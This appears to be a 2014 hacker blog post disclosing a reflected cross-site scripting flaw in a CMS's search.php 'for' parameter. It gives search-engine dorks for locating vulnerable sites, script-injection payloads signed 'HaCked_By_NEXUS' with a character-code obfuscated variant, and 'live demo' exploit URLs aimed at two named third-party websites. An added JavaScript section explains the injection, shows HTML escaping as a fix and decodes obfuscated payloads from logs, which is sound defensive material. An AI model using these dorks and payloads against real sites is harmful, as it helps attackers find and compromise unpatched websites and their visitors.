Tuesday, 1 July 2014

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central"
* The "for" parameter of search.php is reflected into the results page without encoding, so it is VULNERABLE to reflected XSS.

Exploits:
"><script>alert('HaCked_By_NEXUS');</script>&search_submit=Search
The leading "> closes the quoted attribute (and the tag) that the value lands in, so the script that follows is parsed as page markup.
Or, if the plain payload does not fire (for example because the quotes inside alert() are filtered or mangled), replace the string literal with character codes:
"><script>alert(String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33));</script>&search_submit=Search
String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33) evaluates to "HaCked By NEXUS !"; the HackBar add-on for Firefox can generate this encoding for you.
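As an added example (not part of the original post, and not the CMS's own code), the JavaScript below shows why the payload works and how to build or read back the character-code form without HackBar. The search-form template it reflects the parameter into is an assumption about what search.php emits; the real markup is not shown here.

```javascript
// Added example, not code from the original post or the affected CMS.
// ASSUMPTION: search.php echoes the "for" parameter into the value="" of the
// search box. The real template is not shown in the post.

// Reflects the "for" parameter the way a vulnerable search.php would: the value
// is concatenated raw, so a leading "> closes the attribute and the <input> tag.
function renderSearchUnsafe(forParam) {
  return '<form action="search.php"><input type="text" name="for" value="' +
         forParam + '"><input type="submit" name="search_submit" value="Search"></form>';
}

// Minimal equivalent of PHP's htmlspecialchars($s, ENT_QUOTES): every character
// that could end the attribute or open a tag becomes an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// The fix: same template, but the parameter is encoded before it is reflected.
function renderSearchSafe(forParam) {
  return renderSearchUnsafe(escapeHtml(forParam));
}

// Builds the quote-free form used in the post for any text, e.g.
// toFromCharCode("HaCked By NEXUS !") -> "String.fromCharCode(72, 97, 67, ...)".
// This is what HackBar's encoder does; generating it here removes the need for it.
function toFromCharCode(text) {
  const codes = [];
  for (const ch of text) codes.push(ch.codePointAt(0));
  return 'String.fromCharCode(' + codes.join(', ') + ')';
}

// Reverse direction: recover the message from a String.fromCharCode(...) call
// found in a URL or a web server log line, without evaluating it.
function fromCharCodeToText(expr) {
  const m = /String\.fromCharCode\(([\d,\s]*)\)/.exec(expr);
  if (!m) return null;
  if (m[1].trim() === '') return '';
  return m[1].split(',').map(n => String.fromCodePoint(Number(n.trim()))).join('');
}

// Does the rendered page now contain a <script> element the template never had?
function hasInjectedScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

// The quote-free payload from the post, rebuilt from its message text.
const payload = '"><script>alert(' + toFromCharCode('HaCked By NEXUS !') + ');</script>';

console.log(payload);
console.log('unsafe page injected:', hasInjectedScript(renderSearchUnsafe(payload)));
console.log('safe page injected:  ', hasInjectedScript(renderSearchSafe(payload)));
console.log('decoded message:     ', fromCharCodeToText(payload));
```

Feeding the payload to renderSearchUnsafe yields a page with a live script element; renderSearchSafe turns the `">` and `<script>` into `&quot;&gt;` and `&lt;script&gt;`, so the same input stays inside the attribute as harmless text. fromCharCodeToText is the check you want when triaging logs: it tells you what an obfuscated alert() actually said.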

If you don't have HackBar, download it from:
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS